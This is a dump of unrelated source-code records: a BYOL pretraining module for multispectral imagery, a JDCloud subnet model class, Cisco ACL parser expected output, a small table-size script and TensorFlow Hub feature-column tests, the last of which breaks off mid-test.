Conv2d, Linear, Module, ReLU, Sequential\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torchvision.models import resnet18\nfrom torchvision.models.resnet import resnet50\n\n# https://github.com/pytorch/pytorch/issues/60979\n# https://github.com/pytorch/pytorch/pull/61045\nModule.__module__ = \"torch.nn\"\n\n\ndef normalized_mse(x: Tensor, y: Tensor) -> Tensor:\n \"\"\"Computes the normalized mean squared error between x and y.\n\n Args:\n x: tensor x\n y: tensor y\n\n Returns:\n the normalized MSE between x and y\n \"\"\"\n x = F.normalize(x, dim=-1)\n y = F.normalize(y, dim=-1)\n mse = torch.mean(2 - 2 * (x * y).sum(dim=-1))\n return mse\n\n\n# TODO: Move this to transforms\nclass RandomApply(Module):\n \"\"\"Applies augmentation function (augm) with probability p.\"\"\"\n\n def __init__(self, augm: Callable[[Tensor], Tensor], p: float) -> None:\n \"\"\"Initialize RandomApply.\n\n Args:\n augm: augmentation function to apply\n p: probability with which the augmentation function is applied\n \"\"\"\n super().__init__()\n self.augm = augm\n self.p = p\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Applies an augmentation to the input with some probability.\n\n Args:\n x: a batch of imagery\n\n Returns\n augmented version of ``x`` with probability ``self.p`` else an un-augmented\n version\n \"\"\"\n return x if random.random() > self.p else self.augm(x)\n\n\n# TODO: This isn't _really_ applying the augmentations from SimCLR as we have\n# multispectral imagery and thus can't naively apply color jittering or grayscale\n# conversions. We should think more about what makes sense here.\nclass SimCLRAugmentation(Module):\n \"\"\"A module for applying SimCLR augmentations.\n\n SimCLR was one of the first papers to show the effectiveness of random data\n augmentation in self-supervised-learning setups. See\n https://arxiv.org/pdf/2002.05709.pdf for more details.\n \"\"\"\n\n def __init__(self, image_size: Tuple[int, int] = (256, 256)) -> None:\n \"\"\"Initialize a module for applying SimCLR augmentations.\n\n Args:\n image_size: Tuple of integers defining the image size\n \"\"\"\n super().__init__()\n self.size = image_size\n\n self.augmentation = Sequential(\n KorniaTransform.Resize(size=image_size, align_corners=False),\n # Not suitable for multispectral adapt\n # RandomApply(K.ColorJitter(0.8, 0.8, 0.8, 0.2), p=0.8),\n # K.RandomGrayscale(p=0.2),\n K.RandomHorizontalFlip(),\n RandomApply(filters.GaussianBlur2d((3, 3), (1.5, 1.5)), p=0.1),\n K.RandomResizedCrop(size=image_size),\n )\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Applys SimCLR augmentations to the input tensor.\n\n Args:\n x: a batch of imagery\n\n Returns:\n an augmented batch of imagery\n \"\"\"\n return cast(Tensor, self.augmentation(x))\n\n\nclass MLP(Module):\n \"\"\"MLP used in the BYOL projection head.\"\"\"\n\n def __init__(\n self, dim: int, projection_size: int = 256, hidden_size: int = 4096\n ) -> None:\n \"\"\"Initializes the MLP projection head.\n\n Args:\n dim: size of layer to project\n projection_size: size of the output layer\n hidden_size: size of the hidden layer\n \"\"\"\n super().__init__()\n self.mlp = Sequential(\n Linear(dim, hidden_size),\n BatchNorm1d(hidden_size), # type: ignore[no-untyped-call]\n ReLU(inplace=True),\n Linear(hidden_size, projection_size),\n )\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Forward pass of the MLP model.\n\n Args:\n x: batch of imagery\n\n Returns:\n embedded version of the input\n \"\"\"\n return cast(Tensor, self.mlp(x))\n\n\nclass EncoderWrapper(Module):\n \"\"\"Encoder wrapper for joining a model and a projection head.\n\n When we call .forward() on this module the following steps happen:\n\n * The input is passed through the base model\n * When the encoding layer is reached a hook is called\n * The output of the encoding layer is passed through the projection head\n * The forward call returns the output of the projection head\n \"\"\"\n\n def __init__(\n self,\n model: Module,\n projection_size: int = 256,\n hidden_size: int = 4096,\n layer: int = -2,\n ) -> None:\n \"\"\"Initializes EncoderWrapper.\n\n Args:\n model: model to encode\n projection_size: size of the ouput layer of the projector MLP\n hidden_size: size of hidden layer of the projector MLP\n layer: layer from model to project\n \"\"\"\n super().__init__()\n\n self.model = model\n self.projection_size = projection_size\n self.hidden_size = hidden_size\n self.layer = layer\n\n self._projector: Optional[Module] = None\n self._projector_dim: Optional[int] = None\n self._encoded = torch.empty(0)\n self._register_hook()\n\n @property\n def projector(self) -> Module:\n \"\"\"Wrapper module for the projector head.\"\"\"\n assert self._projector_dim is not None\n if self._projector is None:\n self._projector = MLP(\n self._projector_dim, self.projection_size, self.hidden_size\n )\n return self._projector\n\n def _hook(self, module: Any, input: Any, output: Tensor) -> None:\n \"\"\"Hook to record the activations at the projection layer.\n\n See the following docs page for more details on hooks:\n https://pytorch.org/docs/stable/generated/torch.nn.modules.module.register_module_forward_hook.html\n\n Args:\n module: the calling module\n input: input to the module this hook was registered to\n output: output from the module this hook was registered to\n \"\"\"\n output = output.flatten(start_dim=1)\n if self._projector_dim is None:\n # If we haven't already, measure the output size\n self._projector_dim = output.shape[-1]\n\n # Project the output to get encodings, the projector model is created the first\n # time this is called\n self._encoded = self.projector(output)\n\n def _register_hook(self) -> None:\n \"\"\"Register a hook for layer that we will extract features from.\"\"\"\n layer = list(self.model.children())[self.layer]\n layer.register_forward_hook(self._hook)\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Pass through the model, and collect the representation from our forward hook.\n\n Args:\n x: tensor of data to run through the model\n\n Returns:\n output from the model\n \"\"\"\n _ = self.model(x)\n return self._encoded\n\n\nclass BYOL(Module):\n \"\"\"BYOL implementation.\n\n BYOL contains two identical encoder networks. The first is trained as usual, and its\n weights are updated with each training batch. The second, \"target\" network, is\n updated using a running average of the first encoder's weights.\n\n See https://arxiv.org/abs/2006.07733 for more details (and please cite it if you\n use it in your own work).\n \"\"\"\n\n def __init__(\n self,\n model: Module,\n image_size: Tuple[int, int] = (256, 256),\n hidden_layer: int = -2,\n in_channels: int = 4,\n projection_size: int = 256,\n hidden_size: int = 4096,\n augment_fn: Optional[Module] = None,\n beta: float = 0.99,\n **kwargs: Any,\n ) -> None:\n \"\"\"Sets up a model for pre-training with BYOL using projection heads.\n\n Args:\n model: the model to pretrain using BYOL\n image_size: the size of the training images\n hidden_layer: the hidden layer in ``model`` to attach the projection\n head to, can be the name of the layer or index of the layer\n in_channels: number of input channels to the model\n projection_size: size of first layer of the projection MLP\n hidden_size: size of the hidden layer of the projection MLP\n augment_fn: an instance of a module that performs data augmentation\n beta: the speed at which the target encoder is updated using the main\n encoder\n \"\"\"\n super().__init__()\n\n self.augment: Module\n if augment_fn is None:\n self.augment = SimCLRAugmentation(image_size)\n else:\n self.augment = augment_fn\n\n self.beta = beta\n self.in_channels = in_channels\n self.encoder = EncoderWrapper(\n model, projection_size, hidden_size, layer=hidden_layer\n )\n self.predictor = MLP(projection_size, projection_size, hidden_size)\n self.target = EncoderWrapper(\n model, projection_size, hidden_size, layer=hidden_layer\n )\n\n # Perform a single forward pass to initialize the wrapper correctly\n self.encoder(torch.zeros(2, self.in_channels, *image_size))\n\n def forward(self, x: Tensor) -> Tensor:\n \"\"\"Forward pass of the encoder model through the MLP and prediction head.\n\n Args:\n x: tensor of data to run through the model\n\n Returns:\n output from the model\n \"\"\"\n return cast(Tensor, self.predictor(self.encoder(x)))\n\n def update_target(self) -> None:\n \"\"\"Method to update the \"target\" model weights.\"\"\"\n for p, pt in zip(self.encoder.parameters(), self.target.parameters()):\n pt.data = self.beta * pt.data + (1 - self.beta) * p.data\n\n\nclass BYOLTask(LightningModule):\n \"\"\"Class for pre-training any PyTorch model using BYOL.\"\"\"\n\n def config_task(self) -> None:\n \"\"\"Configures the task based on kwargs parameters passed to the constructor.\"\"\"\n in_channels = self.hyperparams[\"in_channels\"]\n pretrained = self.hyperparams[\"imagenet_pretraining\"]\n encoder = None\n\n if self.hyperparams[\"encoder_name\"] == \"resnet18\":\n encoder = resnet18(pretrained=pretrained)\n elif self.hyperparams[\"encoder_name\"] == \"resnet50\":\n encoder = resnet50(pretrained=pretrained)\n else:\n raise ValueError(\n f\"Encoder type '{self.hyperparams['encoder_name']}' is not valid.\"\n )\n\n layer = encoder.conv1\n # Creating new Conv2d layer\n new_layer = Conv2d(\n in_channels=in_channels,\n out_channels=layer.out_channels,\n kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=layer.bias,\n ).requires_grad_()\n # initialize the weights from new channel with the red channel weights\n copy_weights = 0\n # Copying the weights from the old to the new layer\n new_layer.weight[:, : layer.in_channels, :, :].data[:] = Variable(\n layer.weight.clone(), requires_grad=True\n )\n # Copying the weights of the old layer to the extra channels\n for i in range(in_channels - layer.in_channels):\n channel = layer.in_channels + i\n new_layer.weight[:, channel : channel + 1, :, :].data[:] = Variable(\n layer.weight[:, copy_weights : copy_weights + 1, ::].clone(),\n requires_grad=True,\n )\n\n encoder.conv1 = new_layer\n self.model = BYOL(encoder, in_channels=in_channels, image_size=(256, 256))\n\n def __init__(self, **kwargs: Any) -> None:\n \"\"\"Initialize a LightningModule for pre-training a model with BYOL.\n\n Keyword Args:\n in_channels: number of channels on the input imagery\n encoder_name: either \"resnet18\" or \"resnet50\"\n imagenet_pretraining: bool indicating whether to use imagenet pretrained\n weights\n\n Raises:\n ValueError: if kwargs arguments are invalid\n \"\"\"\n super().__init__()\n\n # Creates `self.hparams` from kwargs\n self.save_hyperparameters() # type: ignore[operator]\n self.hyperparams = cast(Dict[str, Any], self.hparams)\n\n self.config_task()\n\n def forward(self, *args: Any, **kwargs: Any) -> Any:\n \"\"\"Forward pass of the model.\n\n Args:\n x: tensor of data to run through the model\n\n Returns:\n output from the model\n \"\"\"\n return self.model(*args, **kwargs)\n\n def configure_optimizers(self) -> Dict[str, Any]:\n \"\"\"Initialize the optimizer and learning rate scheduler.\n\n Returns:\n a \"lr dict\" according to the pytorch lightning documentation --\n https://pytorch-lightning.readthedocs.io/en/latest/common/lightning_module.html#configure-optimizers\n \"\"\"\n optimizer_class = getattr(optim, self.hyperparams.get(\"optimizer\", \"Adam\"))\n lr = self.hyperparams.get(\"lr\", 1e-4)\n weight_decay = self.hyperparams.get(\"weight_decay\", 1e-6)\n optimizer = optimizer_class(self.parameters(), lr=lr, weight_decay=weight_decay)\n\n return {\n \"optimizer\": optimizer,\n \"lr_scheduler\": {\n \"scheduler\": ReduceLROnPlateau(\n optimizer,\n patience=self.hyperparams[\"learning_rate_schedule_patience\"],\n ),\n \"monitor\": \"val_loss\",\n },\n }\n\n def training_step(self, *args: Any, **kwargs: Any) -> Tensor:\n \"\"\"Compute and return the training loss.\n\n Args:\n batch: the output of your DataLoader\n\n Returns:\n training loss\n \"\"\"\n batch = args[0]\n x = batch[\"image\"]\n with torch.no_grad():\n x1, x2 = self.model.augment(x), self.model.augment(x)\n\n pred1, pred2 = self.forward(x1), self.forward(x2)\n with torch.no_grad():\n targ1, targ2 = self.model.target(x1), self.model.target(x2)\n loss = torch.mean(normalized_mse(pred1, targ2) + normalized_mse(pred2, targ1))\n\n self.log(\"train_loss\", loss, on_step=True, on_epoch=False)\n self.model.update_target()\n\n return loss\n\n def validation_step(self, *args: Any, **kwargs: Any) -> None:\n \"\"\"Compute validation loss.\n\n Args:\n batch: the output of your DataLoader\n \"\"\"\n batch = args[0]\n x = batch[\"image\"]\n x1, x2 = self.model.augment(x), self.model.augment(x)\n pred1, pred2 = self.forward(x1), self.forward(x2)\n targ1, targ2 = self.model.target(x1), self.model.target(x2)\n loss = torch.mean(normalized_mse(pred1, targ2) + normalized_mse(pred2, targ1))\n\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True)\n\n def test_step(self, *args: Any, **kwargs: Any) -> Any:\n \"\"\"No-op, does nothing.\"\"\"\n"} {"ext": "py", "sha": "1a2fca7df226f2bba9bf64f240edd3ed5bdefb39", "content": "# coding=utf8\n\n# Copyright 2018 JDCLOUD.COM\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# NOTE: This class is auto generated by the jdcloud code generator program.\n\n\nclass Subnet(object):\n\n def __init__(self, region=None, az=None, subnetId=None, name=None, cidr=None, vpcId=None, vpcName=None, availableIpCount=None, totalIpCount=None, networkType=None, description=None, createTime=None):\n \"\"\"\n :param region: (Optional) 地域代码, 如cn-east-1\n :param az: (Optional) 可用区, 如cn-east-1a\n :param subnetId: (Optional) 子网ID\n :param name: (Optional) 子网名称\n :param cidr: (Optional) 子网CIDR\n :param vpcId: (Optional) 私有网络Id\n :param vpcName: (Optional) 私有网络名称\n :param availableIpCount: (Optional) 可用ip数量\n :param totalIpCount: (Optional) 总ip数量\n :param networkType: (Optional) 网络类型\n :param description: (Optional) 描述\n :param createTime: (Optional) 创建时间\n \"\"\"\n\n self.region = region\n self.az = az\n self.subnetId = subnetId\n self.name = name\n self.cidr = cidr\n self.vpcId = vpcId\n self.vpcName = vpcName\n self.availableIpCount = availableIpCount\n self.totalIpCount = totalIpCount\n self.networkType = networkType\n self.description = description\n self.createTime = createTime\n"} {"ext": "py", "sha": "1a2fcb1b2b6c20c380d179e48985d1ca52ef3f7b", "content": "expected_output = {\n \"1\":{\n \"name\":\"1\",\n \"type\":\"ipv4-acl-type\",\n \"acl_type\": \"standard\",\n \"aces\":{\n \"10\":{\n \"name\":\"10\",\n \"actions\":{\n \"forwarding\":\"deny\",\n \"logging\":\"log-syslog\"\n },\n \"matches\":{\n \"l3\":{\n \"ipv4\":{\n \"protocol\":\"ipv4\",\n \"source_network\":{\n \"10.9.3.4 0.0.0.0\":{\n \"source_network\":\"10.9.3.4 0.0.0.0\"\n }\n }\n }\n }\n },\n \"statistics\":{\n \"matched_packets\":\"18\"\n }\n },\n \"20\":{\n \"name\":\"20\",\n \"actions\":{\n \"forwarding\":\"permit\"\n },\n \"matches\":{\n \"l3\":{\n \"ipv4\":{\n \"protocol\":\"ipv4\",\n \"source_network\":{\n \"any\":{\n \"source_network\":\"any\"\n }\n }\n }\n }\n },\n \"statistics\":{\n \"matched_packets\":\"58\"\n }\n }\n }\n },\n \"meraki-fqdn-dns\":{\n \"name\":\"meraki-fqdn-dns\",\n \"type\":\"ipv4-acl-type\",\n \"acl_type\": \"extended\",\n }\n}"} {"ext": "py", "sha": "1a2fcc45162161d008efc1854c54852b37f3933d", "content": "#!/usr/bin/env python\nimport sys\n\nentries = []\ntotal_size = 0;\nfor line in sys.stdin:\n words = line.split('\\t')\n if len(words) != 2:\n continue\n sizeStr = words[1].strip('\\n')\n if not sizeStr.isdigit():\n continue\n size = float(sizeStr)\n elem = {'table':words[0], 'size':size}\n entries.append(elem)\n total_size += size\n\nprint \"Total: %d\" % total_size\nprint \"Total: %.2f (MB)\" % (total_size / 1024 /1024)\nfor elem in entries:\n print \"%02.2f %s\" % (elem['size']/total_size*100, elem['table'])\n\n\n\n"} {"ext": "py", "sha": "1a2fcd0e841ab12011ae0ea23c66a6dcd8429797", "content": "# Copyright 2018 The TensorFlow Hub Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for tensorflow_hub.feature_column.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# pylint:disable=g-import-not-at-top,g-statement-before-imports\ntry:\n import mock as mock\nexcept ImportError:\n import unittest.mock as mock\n# pylint:disable=g-import-not-at-top,g-statement-before-imports\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow_hub import test_utils\nfrom tensorflow_hub import tf_v1\n\n# pylint: disable=g-direct-tensorflow-import\nfrom tensorflow.python.feature_column import feature_column_v2\nfrom tensorflow.python.ops.lookup_ops import HashTable\nfrom tensorflow.python.ops.lookup_ops import KeyValueTensorInitializer\n# pylint: enable=g-direct-tensorflow-import\n\n_dense_features_module = test_utils.get_dense_features_module()\n\n\ndef text_module_fn():\n embeddings = [\n (\"\", [0, 0, 0, 0]), # OOV items are mapped to this embedding.\n (\"hello world\", [1, 2, 3, 4]),\n (\"pair-programming\", [5, 5, 5, 5]),\n ]\n keys = tf.constant([item[0] for item in embeddings], dtype=tf.string)\n indices = tf.constant(list(range(len(embeddings))), dtype=tf.int64)\n tbl_init = KeyValueTensorInitializer(keys, indices)\n table = HashTable(tbl_init, 0)\n\n weights_initializer = tf.cast(\n tf.constant(list([item[1] for item in embeddings])), tf.float32)\n\n weights = tf_v1.get_variable(\n \"weights\", dtype=tf.float32, initializer=weights_initializer)\n\n text_tensor = tf_v1.placeholder(dtype=tf.string, name=\"text\", shape=[None])\n indices_tensor = table.lookup(text_tensor)\n embedding_tensor = tf.gather(weights, indices_tensor)\n hub.add_signature(inputs=text_tensor, outputs=embedding_tensor)\n\n\ndef invalid_text_module_fn():\n text = tf_v1.placeholder(tf.string, shape=[10])\n hub.add_signature(inputs=text, outputs=tf.zeros([10, 3]))\n\n\nclass CommonColumnTest(tf.test.TestCase):\n\n def setUp(self):\n self.spec = hub.create_module_spec(text_module_fn)\n\n @mock.patch.object(feature_column_v2._StateManagerImpl, \"add_resource\")\n def testFeatureColumnsWithResources(self, mock_add_resource):\n feature_column = hub.text_embedding_column(\"text_a\", self.spec)\n if not isinstance(feature_column, feature_column_v2.FeatureColumn):\n self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n self.assertTrue(feature_column_v2.is_feature_column_v2([feature_column]))\n\n @mock.patch.object(feature_column_v2._StateManagerImpl, \"add_resource\")\n def testFeatureColumnsWithNoResources(self, mock_add_resource):\n mock_add_resource.side_effect = NotImplementedError\n feature_column = hub.text_embedding_column(\"text_a\", self.spec)\n self.assertFalse(feature_column_v2.is_feature_column_v2([feature_column]))\n\n\nclass TextEmbeddingColumnTest(tf.test.TestCase):\n\n def setUp(self):\n self.spec = hub.create_module_spec(text_module_fn)\n\n def testVariableShape(self):\n text_column = hub.text_embedding_column(\"text\", self.spec, trainable=False)\n self.assertEqual(text_column._variable_shape, [4])\n\n def testParents(self):\n text_column = hub.text_embedding_column(\"text\", self.spec, trainable=False)\n self.assertEqual([\"text\"], text_column.parents)\n\n def testMakeParseExampleSpec(self):\n text_column = hub.text_embedding_column(\"text\", self.spec, trainable=False)\n parsing_spec = tf_v1.feature_column.make_parse_example_spec([text_column])\n self.assertEqual(parsing_spec,\n {\"text\": tf_v1.FixedLenFeature([1], dtype=tf.string)})\n\n def testInputLayer(self):\n features = {\n \"text_a\": [\"hello world\", \"pair-programming\"],\n \"text_b\": [\"hello world\", \"oov token\"],\n }\n feature_columns = [\n hub.text_embedding_column(\"text_a\", self.spec, trainable=False),\n hub.text_embedding_column(\"text_b\", self.spec, trainable=False),\n ]\n with tf.Graph().as_default():\n input_layer = tf_v1.feature_column.input_layer(features, feature_columns)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(input_layer)\n self.assertAllEqual(\n output, [[1, 2, 3, 4, 1, 2, 3, 4], [5, 5, 5, 5, 0, 0, 0, 0]])\n\n def testDenseFeatures(self):\n features = {\n \"text_a\": [\"hello world\", \"pair-programming\"],\n \"text_b\": [\"hello world\", \"oov token\"],\n }\n feature_columns = [\n hub.text_embedding_column(\"text_a\", self.spec, trainable=False),\n hub.text_embedding_column(\"text_b\", self.spec, trainable=False),\n ]\n if not feature_column_v2.is_feature_column_v2(feature_columns):\n self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n with tf.Graph().as_default():\n feature_layer = _dense_features_module.DenseFeatures(feature_columns)\n feature_layer_out = feature_layer(features)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(feature_layer_out)\n self.assertAllEqual(\n output, [[1, 2, 3, 4, 1, 2, 3, 4], [5, 5, 5, 5, 0, 0, 0, 0]])\n\n def testDenseFeatures_shareAcrossApplication(self):\n features = {\n \"text\": [\"hello world\", \"pair-programming\"],\n }\n feature_columns = [\n hub.text_embedding_column(\"text\", self.spec, trainable=True),\n ]\n if not feature_column_v2.is_feature_column_v2(feature_columns):\n self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n with tf.Graph().as_default():\n feature_layer = _dense_features_module.DenseFeatures(feature_columns)\n feature_layer_out_1 = feature_layer(features)\n feature_layer_out_2 = feature_layer(features)\n\n # We define loss only on the first layer. Since layers should have shared\n # weights, we expect the second layer will change too.\n loss = feature_layer_out_1 - tf.constant(0.005)\n optimizer = tf_v1.train.GradientDescentOptimizer(learning_rate=0.7)\n train_op = optimizer.minimize(loss)\n\n with tf_v1.train.MonitoredSession() as sess:\n before_update_1 = sess.run(feature_layer_out_1)\n sess.run(train_op)\n after_update_1 = sess.run(feature_layer_out_1)\n after_update_2 = sess.run(feature_layer_out_2)\n\n self.assertAllEqual(before_update_1, [[1, 2, 3, 4],\n [5, 5, 5, 5]])\n self.assertAllEqual(after_update_1, after_update_2)\n\n def testWorksWithCannedEstimator(self):\n comment_embedding_column = hub.text_embedding_column(\n \"comment\", self.spec, trainable=False)\n upvotes = tf_v1.feature_column.numeric_column(\"upvotes\")\n\n feature_columns = [comment_embedding_column, upvotes]\n estimator = tf_v1.estimator.DNNClassifier(\n hidden_units=[10],\n feature_columns=feature_columns,\n model_dir=self.get_temp_dir())\n\n # This only tests that estimator apis are working with the feature\n # column without throwing exceptions.\n features = {\n \"comment\": np.array([\n [\"the quick brown fox\"],\n [\"spam spam spam\"],\n ]),\n \"upvotes\": np.array([\n [20],\n [1],\n ]),\n }\n labels = np.array([[1], [0]])\n if hasattr(tf.compat, \"v1\"):\n numpy_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn\n else:\n numpy_input_fn = tf_v1.estimator.inputs.numpy_input_fn\n input_fn = numpy_input_fn(features, labels, shuffle=True)\n estimator.train(input_fn, max_steps=1)\n estimator.evaluate(input_fn, steps=1)\n estimator.predict(input_fn)\n\n def testTrainableEmbeddingColumn(self):\n feature_columns = [\n hub.text_embedding_column(\"text\", self.spec, trainable=True),\n ]\n\n with tf.Graph().as_default():\n features = {\n \"text\": [\"hello world\", \"pair-programming\"],\n }\n target = [[1, 1, 1, 1], [4, 3, 2, 1]]\n input_layer = tf_v1.feature_column.input_layer(features, feature_columns)\n\n loss = tf.cast(\n tf_v1.losses.mean_squared_error(input_layer, target), tf.float64)\n optimizer = tf_v1.train.GradientDescentOptimizer(learning_rate=0.97)\n train_op = optimizer.minimize(loss)\n\n with tf_v1.train.MonitoredSession() as sess:\n self.assertAllEqual(sess.run(input_layer), [[1, 2, 3, 4], [5, 5, 5, 5]])\n for _ in range(10):\n sess.run(train_op)\n self.assertAllClose(sess.run(input_layer), target, atol=0.5)\n\n def testInvalidTextModule(self):\n spec = hub.create_module_spec(invalid_text_module_fn)\n with self.assertRaisesRegexp(ValueError, \"only one input\"):\n hub.text_embedding_column(\"coment\", spec, trainable=False)\n\n\ndef create_image_module_fn(randomly_initialized=False):\n def image_module_fn():\n \"\"\"Maps 1x2 images to sums of each color channel.\"\"\"\n images = tf_v1.placeholder(dtype=tf.float32, shape=[None, 1, 2, 3])\n if randomly_initialized:\n initializer = tf_v1.random_uniform_initializer(\n minval=-1, maxval=1, dtype=tf.float32)\n else:\n initializer = tf_v1.constant_initializer(1.0, dtype=tf.float32)\n weight = tf_v1.get_variable(\n name=\"weight\", shape=[1], initializer=initializer)\n sum_channels = tf.reduce_sum(images, axis=[1, 2]) * weight\n hub.add_signature(inputs={\"images\": images}, outputs=sum_channels)\n return image_module_fn\n\n\nclass ImageEmbeddingColumnTest(tf.test.TestCase):\n\n def setUp(self):\n self.spec = hub.create_module_spec(create_image_module_fn())\n self.randomly_initialized_spec = hub.create_module_spec(\n create_image_module_fn(randomly_initialized=True))\n\n def testExpectedImageSize(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n # The usage comment recommends this code pattern, so we test it here.\n self.assertSequenceEqual(\n hub.get_expected_image_size(image_column.module_spec), [1, 2])\n\n def testVariableShape(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n self.assertEqual(image_column.variable_shape, [3])\n\n def testParents(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n self.assertEqual([\"image\"], image_column.parents)\n\n def testMakeParseExampleSpec(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n parsing_spec = tf_v1.feature_column.make_parse_example_spec([image_column])\n self.assertEqual(\n parsing_spec,\n {\"image\": tf_v1.FixedLenFeature([1, 2, 3], dtype=tf.float32)})\n\n def testInputLayer(self):\n features = {\n \"image_a\": [[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]]],\n [[[0.7, 0.7, 0.7], [0.1, 0.2, 0.3]]]],\n \"image_b\": [[[[0.1, 0.2, 0.1], [0.2, 0.1, 0.2]]],\n [[[0.1, 0.2, 0.3], [0.3, 0.2, 0.1]]]],\n }\n feature_columns = [\n hub.image_embedding_column(\"image_a\", self.spec),\n hub.image_embedding_column(\"image_b\", self.spec),\n ]\n with tf.Graph().as_default():\n input_layer = tf_v1.feature_column.input_layer(features, feature_columns)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(input_layer)\n self.assertAllClose(\n output,\n [[0.5, 0.7, 0.9, 0.3, 0.3, 0.3], [0.8, 0.9, 1.0, 0.4, 0.4, 0.4]])\n\n def testDenseFeatures(self):\n features = {\n \"image_a\": [[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]]],\n [[[0.7, 0.7, 0.7], [0.1, 0.2, 0.3]]]],\n \"image_b\": [[[[0.1, 0.2, 0.1], [0.2, 0.1, 0.2]]],\n [[[0.1, 0.2, 0.3], [0.3, 0.2, 0.1]]]],\n }\n feature_columns = [\n hub.image_embedding_column(\"image_a\", self.spec),\n hub.image_embedding_column(\"image_b\", self.spec),\n ]\n if not feature_column_v2.is_feature_column_v2(feature_columns):\n self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n with tf.Graph().as_default():\n feature_layer = _dense_features_module.DenseFeatures(feature_columns)\n feature_layer_out = feature_layer(features)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(feature_layer_out)\n self.assertAllClose(\n output,\n [[0.5, 0.7, 0.9, 0.3, 0.3, 0.3], [0.8, 0.9, 1.0, 0.4, 0.4, 0.4]])\n\n def testDenseFeatures_shareAcrossApplication(self):\n features = {\n \"image\": [[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]]],\n [[[0.7, 0.7, 0.7], [0.1, 0.2, 0.3]]]],\n }\n feature_columns = [\n hub.image_embedding_column(\"image\", self.randomly_initialized_spec),\n ]\n if not feature_column_v2.is_feature_column_v2(feature_columns):\n self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n with tf.Graph().as_default():\n feature_layer = _dense_features_module.DenseFeatures(feature_columns)\n feature_layer_out_1 = feature_layer(features)\n feature_layer_out_2 = feature_layer(features)\n\n with tf_v1.train.MonitoredSession() as sess:\n output_1 = sess.run(feature_layer_out_1)\n output_2 = sess.run(feature_layer_out_2)\n\n self.assertAllClose(output_1, output_2)\n\n def testWorksWithCannedEstimator(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n other_column = tf_v1.feature_column.numeric_column(\"number\")\n\n feature_columns = [image_column, other_column]\n estimator = tf_v1.estimator.DNNClassifier(\n hidden_units=[10],\n feature_columns=feature_columns,\n model_dir=self.get_temp_dir())\n\n # This only tests that estimator apis are working with the feature\n # column without throwing exceptions.\n features = {\n \"image\":\n np.array([[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]]],\n [[[0.7, 0.7, 0.7], [0.1, 0.2, 0.3]]]],\n dtype=np.float32),\n \"number\":\n np.array([[20], [1]]),\n }\n labels = np.array([[1], [0]])\n if hasattr(tf.compat, \"v1\"):\n numpy_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn\n else:\n numpy_input_fn = tf_v1.estimator.inputs.numpy_input_fn\n input_fn = numpy_input_fn(features, labels, shuffle=True)\n estimator.train(input_fn, max_steps=1)\n estimator.evaluate(input_fn, steps=1)\n estimator.predict(input_fn)\n\n\nclass SparseTextEmbeddingColumnTest(tf.test.TestCase):\n\n def setUp(self):\n self.spec = hub.create_module_spec(text_module_fn)\n\n def testVariableShape(self):\n text_column = hub.sparse_text_embedding_column(\n \"text\", self.spec, combiner=\"mean\", default_value=None, trainable=False)\n self.assertEqual(text_column._variable_shape, [4])\n\n def testMakeParseExampleSpec(self):\n text_column = hub.sparse_text_embedding_column(\n \"text\", self.spec, combiner=\"mean\", default_value=None, trainable=False)\n parsing_spec = tf_v1.feature_column.make_parse_example_spec([text_column])\n self.assertEqual(parsing_spec, {\"text\": tf_v1.VarLenFeature(tf.string)})\n\n def testParents(self):\n text_column = hub.sparse_text_embedding_column(\n \"text\", self.spec, \"sum\", \"\", trainable=False)\n self.assertEqual([\"text\"], text_column.parents)\n\n def testInputLayer(self):\n with tf.Graph().as_default():\n text_a = tf.SparseTensor(\n values=[\"hello world\", \"pair-programming\", \"hello world\"],\n indices=[[0, 0], [0, 1], [1, 0]],\n dense_shape=[2, 2])\n text_b = tf.SparseTensor(\n values=[\"hello world\", \"oov token\"],\n indices=[[0, 0], [0, 1]],\n dense_shape=[2, 3])\n\n features = {\n \"text_a\": text_a,\n \"text_b\": text_b,\n 